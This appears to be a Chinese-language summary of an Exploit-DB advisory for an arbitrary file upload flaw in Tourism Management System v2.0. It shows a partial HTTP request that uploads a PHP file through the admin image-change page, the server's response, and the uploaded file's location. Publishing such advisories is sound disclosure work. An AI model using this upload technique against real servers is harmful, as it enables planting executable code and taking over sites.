关键漏洞信息 漏洞标题: Tourism Management System v2.0 - Arbitrary File Upload EDB-ID: 51923 CVE: N/A 作者: SoSPIro 类型: WEBAPPS 平台: PHP 日期: 2024-03-25 易受攻击的应用程序: N/A 影响: 允许管理员将所有文件上传到Web服务器 漏洞描述: 该应用程序由于未能充分清理用户提供的输入,容易受到任意文件上传攻击。 HTTP请求细节 ```plaintext Connection: close Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1 Cookie: PHPSESSID=eqms3ipedmm41hqa1d1nu10ebv Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-PwnFox-Color: red -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php" Content-Type: text/plain -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="submit" -----------------------------390927495111779706051786831201-- ======================================== Response - HTTP/1.1 200 OK Date: Sun, 18 Feb 2024 04:33:37 GMT Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev X-Powered-By: PHP/8.1.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8146 ======================================== File location - http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php